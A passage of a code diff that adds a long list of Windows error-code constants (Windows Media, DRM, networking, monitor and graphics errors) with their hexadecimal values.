+NS_E_INVALID_FILE_BITRATE = 0xC00D1BD1
+NS_E_SAME_AS_INPUT_COMBINATION = 0xC00D1BD2
+NS_E_SOURCE_CANNOT_LOOP = 0xC00D1BD3
+NS_E_INVALID_FOLDDOWN_COEFFICIENTS = 0xC00D1BD4
+NS_E_DRMPROFILE_NOTFOUND = 0xC00D1BD5
+NS_E_INVALID_TIMECODE = 0xC00D1BD6
+NS_E_NO_AUDIO_TIMECOMPRESSION = 0xC00D1BD7
+NS_E_NO_TWOPASS_TIMECOMPRESSION = 0xC00D1BD8
+NS_E_TIMECODE_REQUIRES_VIDEOSTREAM = 0xC00D1BD9
+NS_E_NO_MBR_WITH_TIMECODE = 0xC00D1BDA
+NS_E_INVALID_INTERLACEMODE = 0xC00D1BDB
+NS_E_INVALID_INTERLACE_COMPAT = 0xC00D1BDC
+NS_E_INVALID_NONSQUAREPIXEL_COMPAT = 0xC00D1BDD
+NS_E_INVALID_SOURCE_WITH_DEVICE_CONTROL = 0xC00D1BDE
+NS_E_CANNOT_GENERATE_BROADCAST_INFO_FOR_QUALITYVBR = 0xC00D1BDF
+NS_E_EXCEED_MAX_DRM_PROFILE_LIMIT = 0xC00D1BE0
+NS_E_DEVICECONTROL_UNSTABLE = 0xC00D1BE1
+NS_E_INVALID_PIXEL_ASPECT_RATIO = 0xC00D1BE2
+NS_E_AUDIENCE__LANGUAGE_CONTENTTYPE_MISMATCH = 0xC00D1BE3
+NS_E_INVALID_PROFILE_CONTENTTYPE = 0xC00D1BE4
+NS_E_TRANSFORM_PLUGIN_NOT_FOUND = 0xC00D1BE5
+NS_E_TRANSFORM_PLUGIN_INVALID = 0xC00D1BE6
+NS_E_EDL_REQUIRED_FOR_DEVICE_MULTIPASS = 0xC00D1BE7
+NS_E_INVALID_VIDEO_WIDTH_FOR_INTERLACED_ENCODING = 0xC00D1BE8
+NS_E_MARKIN_UNSUPPORTED = 0xC00D1BE9
+NS_E_DRM_INVALID_APPLICATION = 0xC00D2711
+NS_E_DRM_LICENSE_STORE_ERROR = 0xC00D2712
+NS_E_DRM_SECURE_STORE_ERROR = 0xC00D2713
+NS_E_DRM_LICENSE_STORE_SAVE_ERROR = 0xC00D2714
+NS_E_DRM_SECURE_STORE_UNLOCK_ERROR = 0xC00D2715
+NS_E_DRM_INVALID_CONTENT = 0xC00D2716
+NS_E_DRM_UNABLE_TO_OPEN_LICENSE = 0xC00D2717
+NS_E_DRM_INVALID_LICENSE = 0xC00D2718
+NS_E_DRM_INVALID_MACHINE = 0xC00D2719
+NS_E_DRM_ENUM_LICENSE_FAILED = 0xC00D271B
+NS_E_DRM_INVALID_LICENSE_REQUEST = 0xC00D271C
+NS_E_DRM_UNABLE_TO_INITIALIZE = 0xC00D271D
+NS_E_DRM_UNABLE_TO_ACQUIRE_LICENSE = 0xC00D271E
+NS_E_DRM_INVALID_LICENSE_ACQUIRED = 0xC00D271F
+NS_E_DRM_NO_RIGHTS = 0xC00D2720
+NS_E_DRM_KEY_ERROR = 0xC00D2721
+NS_E_DRM_ENCRYPT_ERROR = 0xC00D2722
+NS_E_DRM_DECRYPT_ERROR = 0xC00D2723
+NS_E_DRM_LICENSE_INVALID_XML = 0xC00D2725
+NS_E_DRM_NEEDS_INDIVIDUALIZATION = 0xC00D2728
+NS_E_DRM_ALREADY_INDIVIDUALIZED = 0xC00D2729
+NS_E_DRM_ACTION_NOT_QUERIED = 0xC00D272A
+NS_E_DRM_ACQUIRING_LICENSE = 0xC00D272B
+NS_E_DRM_INDIVIDUALIZING = 0xC00D272C
+NS_E_BACKUP_RESTORE_FAILURE = 0xC00D272D
+NS_E_BACKUP_RESTORE_BAD_REQUEST_ID = 0xC00D272E
+NS_E_DRM_PARAMETERS_MISMATCHED = 0xC00D272F
+NS_E_DRM_UNABLE_TO_CREATE_LICENSE_OBJECT = 0xC00D2730
+NS_E_DRM_UNABLE_TO_CREATE_INDI_OBJECT = 0xC00D2731
+NS_E_DRM_UNABLE_TO_CREATE_ENCRYPT_OBJECT = 0xC00D2732
+NS_E_DRM_UNABLE_TO_CREATE_DECRYPT_OBJECT = 0xC00D2733
+NS_E_DRM_UNABLE_TO_CREATE_PROPERTIES_OBJECT = 0xC00D2734
+NS_E_DRM_UNABLE_TO_CREATE_BACKUP_OBJECT = 0xC00D2735
+NS_E_DRM_INDIVIDUALIZE_ERROR = 0xC00D2736
+NS_E_DRM_LICENSE_OPEN_ERROR = 0xC00D2737
+NS_E_DRM_LICENSE_CLOSE_ERROR = 0xC00D2738
+NS_E_DRM_GET_LICENSE_ERROR = 0xC00D2739
+NS_E_DRM_QUERY_ERROR = 0xC00D273A
+NS_E_DRM_REPORT_ERROR = 0xC00D273B
+NS_E_DRM_GET_LICENSESTRING_ERROR = 0xC00D273C
+NS_E_DRM_GET_CONTENTSTRING_ERROR = 0xC00D273D
+NS_E_DRM_MONITOR_ERROR = 0xC00D273E
+NS_E_DRM_UNABLE_TO_SET_PARAMETER = 0xC00D273F
+NS_E_DRM_INVALID_APPDATA = 0xC00D2740
+NS_E_DRM_INVALID_APPDATA_VERSION = 0xC00D2741
+NS_E_DRM_BACKUP_EXISTS = 0xC00D2742
+NS_E_DRM_BACKUP_CORRUPT = 0xC00D2743
+NS_E_DRM_BACKUPRESTORE_BUSY = 0xC00D2744
+NS_E_BACKUP_RESTORE_BAD_DATA = 0xC00D2745
+NS_E_DRM_LICENSE_UNUSABLE = 0xC00D2748
+NS_E_DRM_INVALID_PROPERTY = 0xC00D2749
+NS_E_DRM_SECURE_STORE_NOT_FOUND = 0xC00D274A
+NS_E_DRM_CACHED_CONTENT_ERROR = 0xC00D274B
+NS_E_DRM_INDIVIDUALIZATION_INCOMPLETE = 0xC00D274C
+NS_E_DRM_DRIVER_AUTH_FAILURE = 0xC00D274D
+NS_E_DRM_NEED_UPGRADE_MSSAP = 0xC00D274E
+NS_E_DRM_REOPEN_CONTENT = 0xC00D274F
+NS_E_DRM_DRIVER_DIGIOUT_FAILURE = 0xC00D2750
+NS_E_DRM_INVALID_SECURESTORE_PASSWORD = 0xC00D2751
+NS_E_DRM_APPCERT_REVOKED = 0xC00D2752
+NS_E_DRM_RESTORE_FRAUD = 0xC00D2753
+NS_E_DRM_HARDWARE_INCONSISTENT = 0xC00D2754
+NS_E_DRM_SDMI_TRIGGER = 0xC00D2755
+NS_E_DRM_SDMI_NOMORECOPIES = 0xC00D2756
+NS_E_DRM_UNABLE_TO_CREATE_HEADER_OBJECT = 0xC00D2757
+NS_E_DRM_UNABLE_TO_CREATE_KEYS_OBJECT = 0xC00D2758
+NS_E_DRM_LICENSE_NOTACQUIRED = 0xC00D2759
+NS_E_DRM_UNABLE_TO_CREATE_CODING_OBJECT = 0xC00D275A
+NS_E_DRM_UNABLE_TO_CREATE_STATE_DATA_OBJECT = 0xC00D275B
+NS_E_DRM_BUFFER_TOO_SMALL = 0xC00D275C
+NS_E_DRM_UNSUPPORTED_PROPERTY = 0xC00D275D
+NS_E_DRM_ERROR_BAD_NET_RESP = 0xC00D275E
+NS_E_DRM_STORE_NOTALLSTORED = 0xC00D275F
+NS_E_DRM_SECURITY_COMPONENT_SIGNATURE_INVALID = 0xC00D2760
+NS_E_DRM_INVALID_DATA = 0xC00D2761
+NS_E_DRM_POLICY_DISABLE_ONLINE = 0xC00D2762
+NS_E_DRM_UNABLE_TO_CREATE_AUTHENTICATION_OBJECT = 0xC00D2763
+NS_E_DRM_NOT_CONFIGURED = 0xC00D2764
+NS_E_DRM_DEVICE_ACTIVATION_CANCELED = 0xC00D2765
+NS_E_BACKUP_RESTORE_TOO_MANY_RESETS = 0xC00D2766
+NS_E_DRM_DEBUGGING_NOT_ALLOWED = 0xC00D2767
+NS_E_DRM_OPERATION_CANCELED = 0xC00D2768
+NS_E_DRM_RESTRICTIONS_NOT_RETRIEVED = 0xC00D2769
+NS_E_DRM_UNABLE_TO_CREATE_PLAYLIST_OBJECT = 0xC00D276A
+NS_E_DRM_UNABLE_TO_CREATE_PLAYLIST_BURN_OBJECT = 0xC00D276B
+NS_E_DRM_UNABLE_TO_CREATE_DEVICE_REGISTRATION_OBJECT = 0xC00D276C
+NS_E_DRM_UNABLE_TO_CREATE_METERING_OBJECT = 0xC00D276D
+NS_E_DRM_TRACK_EXCEEDED_PLAYLIST_RESTICTION = 0xC00D2770
+NS_E_DRM_TRACK_EXCEEDED_TRACKBURN_RESTRICTION = 0xC00D2771
+NS_E_DRM_UNABLE_TO_GET_DEVICE_CERT = 0xC00D2772
+NS_E_DRM_UNABLE_TO_GET_SECURE_CLOCK = 0xC00D2773
+NS_E_DRM_UNABLE_TO_SET_SECURE_CLOCK = 0xC00D2774
+NS_E_DRM_UNABLE_TO_GET_SECURE_CLOCK_FROM_SERVER = 0xC00D2775
+NS_E_DRM_POLICY_METERING_DISABLED = 0xC00D2776
+NS_E_DRM_TRANSFER_CHAINED_LICENSES_UNSUPPORTED = 0xC00D2777
+NS_E_DRM_SDK_VERSIONMISMATCH = 0xC00D2778
+NS_E_DRM_LIC_NEEDS_DEVICE_CLOCK_SET = 0xC00D2779
+NS_E_LICENSE_HEADER_MISSING_URL = 0xC00D277A
+NS_E_DEVICE_NOT_WMDRM_DEVICE = 0xC00D277B
+NS_E_DRM_INVALID_APPCERT = 0xC00D277C
+NS_E_DRM_PROTOCOL_FORCEFUL_TERMINATION_ON_PETITION = 0xC00D277D
+NS_E_DRM_PROTOCOL_FORCEFUL_TERMINATION_ON_CHALLENGE = 0xC00D277E
+NS_E_DRM_CHECKPOINT_FAILED = 0xC00D277F
+NS_E_DRM_BB_UNABLE_TO_INITIALIZE = 0xC00D2780
+NS_E_DRM_UNABLE_TO_LOAD_HARDWARE_ID = 0xC00D2781
+NS_E_DRM_UNABLE_TO_OPEN_DATA_STORE = 0xC00D2782
+NS_E_DRM_DATASTORE_CORRUPT = 0xC00D2783
+NS_E_DRM_UNABLE_TO_CREATE_INMEMORYSTORE_OBJECT = 0xC00D2784
+NS_E_DRM_STUBLIB_REQUIRED = 0xC00D2785
+NS_E_DRM_UNABLE_TO_CREATE_CERTIFICATE_OBJECT = 0xC00D2786
+NS_E_DRM_MIGRATION_TARGET_NOT_ONLINE = 0xC00D2787
+NS_E_DRM_INVALID_MIGRATION_IMAGE = 0xC00D2788
+NS_E_DRM_MIGRATION_TARGET_STATES_CORRUPTED = 0xC00D2789
+NS_E_DRM_MIGRATION_IMPORTER_NOT_AVAILABLE = 0xC00D278A
+NS_DRM_E_MIGRATION_UPGRADE_WITH_DIFF_SID = 0xC00D278B
+NS_DRM_E_MIGRATION_SOURCE_MACHINE_IN_USE = 0xC00D278C
+NS_DRM_E_MIGRATION_TARGET_MACHINE_LESS_THAN_LH = 0xC00D278D
+NS_DRM_E_MIGRATION_IMAGE_ALREADY_EXISTS = 0xC00D278E
+NS_E_DRM_HARDWAREID_MISMATCH = 0xC00D278F
+NS_E_INVALID_DRMV2CLT_STUBLIB = 0xC00D2790
+NS_E_DRM_MIGRATION_INVALID_LEGACYV2_DATA = 0xC00D2791
+NS_E_DRM_MIGRATION_LICENSE_ALREADY_EXISTS = 0xC00D2792
+NS_E_DRM_MIGRATION_INVALID_LEGACYV2_SST_PASSWORD = 0xC00D2793
+NS_E_DRM_MIGRATION_NOT_SUPPORTED = 0xC00D2794
+NS_E_DRM_UNABLE_TO_CREATE_MIGRATION_IMPORTER_OBJECT = 0xC00D2795
+NS_E_DRM_CHECKPOINT_MISMATCH = 0xC00D2796
+NS_E_DRM_CHECKPOINT_CORRUPT = 0xC00D2797
+NS_E_REG_FLUSH_FAILURE = 0xC00D2798
+NS_E_HDS_KEY_MISMATCH = 0xC00D2799
+NS_E_DRM_MIGRATION_OPERATION_CANCELLED = 0xC00D279A
+NS_E_DRM_MIGRATION_OBJECT_IN_USE = 0xC00D279B
+NS_E_DRM_MALFORMED_CONTENT_HEADER = 0xC00D279C
+NS_E_DRM_LICENSE_EXPIRED = 0xC00D27D8
+NS_E_DRM_LICENSE_NOTENABLED = 0xC00D27D9
+NS_E_DRM_LICENSE_APPSECLOW = 0xC00D27DA
+NS_E_DRM_STORE_NEEDINDI = 0xC00D27DB
+NS_E_DRM_STORE_NOTALLOWED = 0xC00D27DC
+NS_E_DRM_LICENSE_APP_NOTALLOWED = 0xC00D27DD
+NS_E_DRM_LICENSE_CERT_EXPIRED = 0xC00D27DF
+NS_E_DRM_LICENSE_SECLOW = 0xC00D27E0
+NS_E_DRM_LICENSE_CONTENT_REVOKED = 0xC00D27E1
+NS_E_DRM_DEVICE_NOT_REGISTERED = 0xC00D27E2
+NS_E_DRM_LICENSE_NOSAP = 0xC00D280A
+NS_E_DRM_LICENSE_NOSVP = 0xC00D280B
+NS_E_DRM_LICENSE_NOWDM = 0xC00D280C
+NS_E_DRM_LICENSE_NOTRUSTEDCODEC = 0xC00D280D
+NS_E_DRM_SOURCEID_NOT_SUPPORTED = 0xC00D280E
+NS_E_DRM_NEEDS_UPGRADE_TEMPFILE = 0xC00D283D
+NS_E_DRM_NEED_UPGRADE_PD = 0xC00D283E
+NS_E_DRM_SIGNATURE_FAILURE = 0xC00D283F
+NS_E_DRM_LICENSE_SERVER_INFO_MISSING = 0xC00D2840
+NS_E_DRM_BUSY = 0xC00D2841
+NS_E_DRM_PD_TOO_MANY_DEVICES = 0xC00D2842
+NS_E_DRM_INDIV_FRAUD = 0xC00D2843
+NS_E_DRM_INDIV_NO_CABS = 0xC00D2844
+NS_E_DRM_INDIV_SERVICE_UNAVAILABLE = 0xC00D2845
+NS_E_DRM_RESTORE_SERVICE_UNAVAILABLE = 0xC00D2846
+NS_E_DRM_CLIENT_CODE_EXPIRED = 0xC00D2847
+NS_E_DRM_NO_UPLINK_LICENSE = 0xC00D2848
+NS_E_DRM_INVALID_KID = 0xC00D2849
+NS_E_DRM_LICENSE_INITIALIZATION_ERROR = 0xC00D284A
+NS_E_DRM_CHAIN_TOO_LONG = 0xC00D284C
+NS_E_DRM_UNSUPPORTED_ALGORITHM = 0xC00D284D
+NS_E_DRM_LICENSE_DELETION_ERROR = 0xC00D284E
+NS_E_DRM_INVALID_CERTIFICATE = 0xC00D28A0
+NS_E_DRM_CERTIFICATE_REVOKED = 0xC00D28A1
+NS_E_DRM_LICENSE_UNAVAILABLE = 0xC00D28A2
+NS_E_DRM_DEVICE_LIMIT_REACHED = 0xC00D28A3
+NS_E_DRM_UNABLE_TO_VERIFY_PROXIMITY = 0xC00D28A4
+NS_E_DRM_MUST_REGISTER = 0xC00D28A5
+NS_E_DRM_MUST_APPROVE = 0xC00D28A6
+NS_E_DRM_MUST_REVALIDATE = 0xC00D28A7
+NS_E_DRM_INVALID_PROXIMITY_RESPONSE = 0xC00D28A8
+NS_E_DRM_INVALID_SESSION = 0xC00D28A9
+NS_E_DRM_DEVICE_NOT_OPEN = 0xC00D28AA
+NS_E_DRM_DEVICE_ALREADY_REGISTERED = 0xC00D28AB
+NS_E_DRM_UNSUPPORTED_PROTOCOL_VERSION = 0xC00D28AC
+NS_E_DRM_UNSUPPORTED_ACTION = 0xC00D28AD
+NS_E_DRM_CERTIFICATE_SECURITY_LEVEL_INADEQUATE = 0xC00D28AE
+NS_E_DRM_UNABLE_TO_OPEN_PORT = 0xC00D28AF
+NS_E_DRM_BAD_REQUEST = 0xC00D28B0
+NS_E_DRM_INVALID_CRL = 0xC00D28B1
+NS_E_DRM_ATTRIBUTE_TOO_LONG = 0xC00D28B2
+NS_E_DRM_EXPIRED_LICENSEBLOB = 0xC00D28B3
+NS_E_DRM_INVALID_LICENSEBLOB = 0xC00D28B4
+NS_E_DRM_INCLUSION_LIST_REQUIRED = 0xC00D28B5
+NS_E_DRM_DRMV2CLT_REVOKED = 0xC00D28B6
+NS_E_DRM_RIV_TOO_SMALL = 0xC00D28B7
+NS_E_OUTPUT_PROTECTION_LEVEL_UNSUPPORTED = 0xC00D2904
+NS_E_COMPRESSED_DIGITAL_VIDEO_PROTECTION_LEVEL_UNSUPPORTED = 0xC00D2905
+NS_E_UNCOMPRESSED_DIGITAL_VIDEO_PROTECTION_LEVEL_UNSUPPORTED = 0xC00D2906
+NS_E_ANALOG_VIDEO_PROTECTION_LEVEL_UNSUPPORTED = 0xC00D2907
+NS_E_COMPRESSED_DIGITAL_AUDIO_PROTECTION_LEVEL_UNSUPPORTED = 0xC00D2908
+NS_E_UNCOMPRESSED_DIGITAL_AUDIO_PROTECTION_LEVEL_UNSUPPORTED = 0xC00D2909
+NS_E_OUTPUT_PROTECTION_SCHEME_UNSUPPORTED = 0xC00D290A
+NS_E_REBOOT_RECOMMENDED = 0xC00D2AFA
+NS_E_REBOOT_REQUIRED = 0xC00D2AFB
+NS_E_SETUP_INCOMPLETE = 0xC00D2AFC
+NS_E_SETUP_DRM_MIGRATION_FAILED = 0xC00D2AFD
+NS_E_SETUP_IGNORABLE_FAILURE = 0xC00D2AFE
+NS_E_SETUP_DRM_MIGRATION_FAILED_AND_IGNORABLE_FAILURE = 0xC00D2AFF
+NS_E_SETUP_BLOCKED = 0xC00D2B00
+NS_E_UNKNOWN_PROTOCOL = 0xC00D2EE0
+NS_E_REDIRECT_TO_PROXY = 0xC00D2EE1
+NS_E_INTERNAL_SERVER_ERROR = 0xC00D2EE2
+NS_E_BAD_REQUEST = 0xC00D2EE3
+NS_E_ERROR_FROM_PROXY = 0xC00D2EE4
+NS_E_PROXY_TIMEOUT = 0xC00D2EE5
+NS_E_SERVER_UNAVAILABLE = 0xC00D2EE6
+NS_E_REFUSED_BY_SERVER = 0xC00D2EE7
+NS_E_INCOMPATIBLE_SERVER = 0xC00D2EE8
+NS_E_MULTICAST_DISABLED = 0xC00D2EE9
+NS_E_INVALID_REDIRECT = 0xC00D2EEA
+NS_E_ALL_PROTOCOLS_DISABLED = 0xC00D2EEB
+NS_E_MSBD_NO_LONGER_SUPPORTED = 0xC00D2EEC
+NS_E_PROXY_NOT_FOUND = 0xC00D2EED
+NS_E_CANNOT_CONNECT_TO_PROXY = 0xC00D2EEE
+NS_E_SERVER_DNS_TIMEOUT = 0xC00D2EEF
+NS_E_PROXY_DNS_TIMEOUT = 0xC00D2EF0
+NS_E_CLOSED_ON_SUSPEND = 0xC00D2EF1
+NS_E_CANNOT_READ_PLAYLIST_FROM_MEDIASERVER = 0xC00D2EF2
+NS_E_SESSION_NOT_FOUND = 0xC00D2EF3
+NS_E_REQUIRE_STREAMING_CLIENT = 0xC00D2EF4
+NS_E_PLAYLIST_ENTRY_HAS_CHANGED = 0xC00D2EF5
+NS_E_PROXY_ACCESSDENIED = 0xC00D2EF6
+NS_E_PROXY_SOURCE_ACCESSDENIED = 0xC00D2EF7
+NS_E_NETWORK_SINK_WRITE = 0xC00D2EF8
+NS_E_FIREWALL = 0xC00D2EF9
+NS_E_MMS_NOT_SUPPORTED = 0xC00D2EFA
+NS_E_SERVER_ACCESSDENIED = 0xC00D2EFB
+NS_E_RESOURCE_GONE = 0xC00D2EFC
+NS_E_NO_EXISTING_PACKETIZER = 0xC00D2EFD
+NS_E_BAD_SYNTAX_IN_SERVER_RESPONSE = 0xC00D2EFE
+NS_E_RESET_SOCKET_CONNECTION = 0xC00D2F00
+NS_E_TOO_MANY_HOPS = 0xC00D2F02
+NS_E_TOO_MUCH_DATA_FROM_SERVER = 0xC00D2F05
+NS_E_CONNECT_TIMEOUT = 0xC00D2F06
+NS_E_PROXY_CONNECT_TIMEOUT = 0xC00D2F07
+NS_E_SESSION_INVALID = 0xC00D2F08
+NS_E_PACKETSINK_UNKNOWN_FEC_STREAM = 0xC00D2F0A
+NS_E_PUSH_CANNOTCONNECT = 0xC00D2F0B
+NS_E_INCOMPATIBLE_PUSH_SERVER = 0xC00D2F0C
+NS_E_END_OF_PLAYLIST = 0xC00D32C8
+NS_E_USE_FILE_SOURCE = 0xC00D32C9
+NS_E_PROPERTY_NOT_FOUND = 0xC00D32CA
+NS_E_PROPERTY_READ_ONLY = 0xC00D32CC
+NS_E_TABLE_KEY_NOT_FOUND = 0xC00D32CD
+NS_E_INVALID_QUERY_OPERATOR = 0xC00D32CF
+NS_E_INVALID_QUERY_PROPERTY = 0xC00D32D0
+NS_E_PROPERTY_NOT_SUPPORTED = 0xC00D32D2
+NS_E_SCHEMA_CLASSIFY_FAILURE = 0xC00D32D4
+NS_E_METADATA_FORMAT_NOT_SUPPORTED = 0xC00D32D5
+NS_E_METADATA_NO_EDITING_CAPABILITY = 0xC00D32D6
+NS_E_METADATA_CANNOT_SET_LOCALE = 0xC00D32D7
+NS_E_METADATA_LANGUAGE_NOT_SUPORTED = 0xC00D32D8
+NS_E_METADATA_NO_RFC1766_NAME_FOR_LOCALE = 0xC00D32D9
+NS_E_METADATA_NOT_AVAILABLE = 0xC00D32DA
+NS_E_METADATA_CACHE_DATA_NOT_AVAILABLE = 0xC00D32DB
+NS_E_METADATA_INVALID_DOCUMENT_TYPE = 0xC00D32DC
+NS_E_METADATA_IDENTIFIER_NOT_AVAILABLE = 0xC00D32DD
+NS_E_METADATA_CANNOT_RETRIEVE_FROM_OFFLINE_CACHE = 0xC00D32DE
+ERROR_MONITOR_INVALID_DESCRIPTOR_CHECKSUM = 0xC0261003
+ERROR_MONITOR_INVALID_STANDARD_TIMING_BLOCK = 0xC0261004
+ERROR_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED = 0xC0261005
+ERROR_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK = 0xC0261006
+ERROR_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK = 0xC0261007
+ERROR_MONITOR_NO_MORE_DESCRIPTOR_DATA = 0xC0261008
+ERROR_MONITOR_INVALID_DETAILED_TIMING_BLOCK = 0xC0261009
+ERROR_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER = 0xC0262000
+ERROR_GRAPHICS_INSUFFICIENT_DMA_BUFFER = 0xC0262001
+ERROR_GRAPHICS_INVALID_DISPLAY_ADAPTER = 0xC0262002
+ERROR_GRAPHICS_ADAPTER_WAS_RESET = 0xC0262003
+ERROR_GRAPHICS_INVALID_DRIVER_MODEL = 0xC0262004
+ERROR_GRAPHICS_PRESENT_MODE_CHANGED = 0xC0262005
+ERROR_GRAPHICS_PRESENT_OCCLUDED = 0xC0262006
+ERROR_GRAPHICS_PRESENT_DENIED = 0xC0262007
+ERROR_GRAPHICS_CANNOTCOLORCONVERT = 0xC0262008
+ERROR_GRAPHICS_NO_VIDEO_MEMORY = 0xC0262100
+ERROR_GRAPHICS_CANT_LOCK_MEMORY = 0xC0262101
+ERROR_GRAPHICS_ALLOCATION_BUSY = 0xC0262102
+ERROR_GRAPHICS_TOO_MANY_REFERENCES = 0xC0262103
+ERROR_GRAPHICS_TRY_AGAIN_LATER = 0xC0262104
+ERROR_GRAPHICS_TRY_AGAIN_NOW = 0xC0262105
+ERROR_GRAPHICS_ALLOCATION_INVALID = 0xC0262106
+ERROR_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE = 0xC0262107
+ERROR_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED = 0xC0262108
+ERROR_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION = 0xC0262109
+ERROR_GRAPHICS_INVALID_ALLOCATION_USAGE = 0xC0262110
+ERROR_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION = 0xC0262111
+ERROR_GRAPHICS_ALLOCATION_CLOSED = 0xC0262112
+ERROR_GRAPHICS_INVALID_ALLOCATION_INSTANCE = 0xC0262113
+ERROR_GRAPHICS_INVALID_ALLOCATION_HANDLE = 0xC0262114
+ERROR_GRAPHICS_WRONG_ALLOCATION_DEVICE = 0xC0262115
+ERROR_GRAPHICS_ALLOCATION_CONTENT_LOST = 0xC0262116
+ERROR_GRAPHICS_GPU_EXCEPTION_ON_DEVICE = 0xC0262200
+ERROR_GRAPHICS_INVALID_VIDPN_TOPOLOGY = 0xC0262300
+ERROR_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED = 0xC0262301
+ERROR_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED = 0xC0262302
+ERROR_GRAPHICS_INVALID_VIDPN = 0xC0262303
+ERROR_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE = 0xC0262304
+ERROR_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET = 0xC0262305
+ERROR_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED = 0xC0262306
+ERROR_GRAPHICS_INVALID_VIDPN_SOURCEMODESET = 0xC0262308
+ERROR_GRAPHICS_INVALID_VIDPN_TARGETMODESET = 0xC0262309
+ERROR_GRAPHICS_INVALID_FREQUENCY = 0xC026230A
+ERROR_GRAPHICS_INVALID_ACTIVE_REGION = 0xC026230B
+ERROR_GRAPHICS_INVALID_TOTAL_REGION = 0xC026230C
+ERROR_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE = 0xC0262310
+ERROR_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE = 0xC0262311
+ERROR_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET = 0xC0262312
+ERROR_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY = 0xC0262313
+ERROR_GRAPHICS_MODE_ALREADY_IN_MODESET = 0xC0262314
+ERROR_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET = 0xC0262315
+ERROR_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET = 0xC0262316
+ERROR_GRAPHICS_SOURCE_ALREADY_IN_SET = 0xC0262317
+ERROR_GRAPHICS_TARGET_ALREADY_IN_SET = 0xC0262318
+ERROR_GRAPHICS_INVALID_VIDPN_PRESENT_PATH = 0xC0262319
+ERROR_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY = 0xC026231A
+ERROR_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET = 0xC026231B
+ERROR_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE = 0xC026231C
+ERROR_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET = 0xC026231D
+ERROR_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET = 0xC026231F
+ERROR_GRAPHICS_STALE_MODESET = 0xC0262320
+ERROR_GRAPHICS_INVALID_MONITOR_SOURCEMODESET = 0xC0262321
+ERROR_GRAPHICS_INVALID_MONITOR_SOURCE_MODE = 0xC0262322
+ERROR_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN = 0xC0262323
+ERROR_GRAPHICS_MODE_ID_MUST_BE_UNIQUE = 0xC0262324
+ERROR_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION = 0xC0262325
+ERROR_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES = 0xC0262326
+ERROR_GRAPHICS_PATH_NOT_IN_TOPOLOGY = 0xC0262327
+ERROR_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE = 0xC0262328
+ERROR_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET = 0xC0262329
+ERROR_GRAPHICS_INVALID_MONITORDESCRIPTORSET = 0xC026232A
+ERROR_GRAPHICS_INVALID_MONITORDESCRIPTOR = 0xC026232B
+ERROR_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET = 0xC026232C
+ERROR_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET = 0xC026232D
+ERROR_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE = 0xC026232E
+ERROR_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE = 0xC026232F
+ERROR_GRAPHICS_RESOURCES_NOT_RELATED = 0xC0262330
+ERROR_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE = 0xC0262331
+ERROR_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE = 0xC0262332
+ERROR_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET = 0xC0262333
+ERROR_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER = 0xC0262334
+ERROR_GRAPHICS_NO_VIDPNMGR = 0xC0262335
+ERROR_GRAPHICS_NO_ACTIVE_VIDPN = 0xC0262336
+ERROR_GRAPHICS_STALE_VIDPN_TOPOLOGY = 0xC0262337
+ERROR_GRAPHICS_MONITOR_NOT_CONNECTED = 0xC0262338
+ERROR_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY = 0xC0262339
+ERROR_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE = 0xC026233A
+ERROR_GRAPHICS_INVALID_VISIBLEREGION_SIZE = 0xC026233B
+ERROR_GRAPHICS_INVALID_STRIDE = 0xC026233C
+ERROR_GRAPHICS_INVALID_PIXELFORMAT = 0xC026233D
+ERROR_GRAPHICS_INVALID_COLORBASIS = 0xC026233E
+ERROR_GRAPHICS_INVALID_PIXELVALUEACCESSMODE = 0xC026233F
+ERROR_GRAPHICS_TARGET_NOT_IN_TOPOLOGY = 0xC0262340
+ERROR_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT = 0xC0262341
+ERROR_GRAPHICS_VIDPN_SOURCE_IN_USE = 0xC0262342
+ERROR_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN = 0xC0262343
+ERROR_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL = 0xC0262344
+ERROR_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION = 0xC0262345
+ERROR_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED = 0xC0262346
+ERROR_GRAPHICS_INVALID_GAMMA_RAMP = 0xC0262347
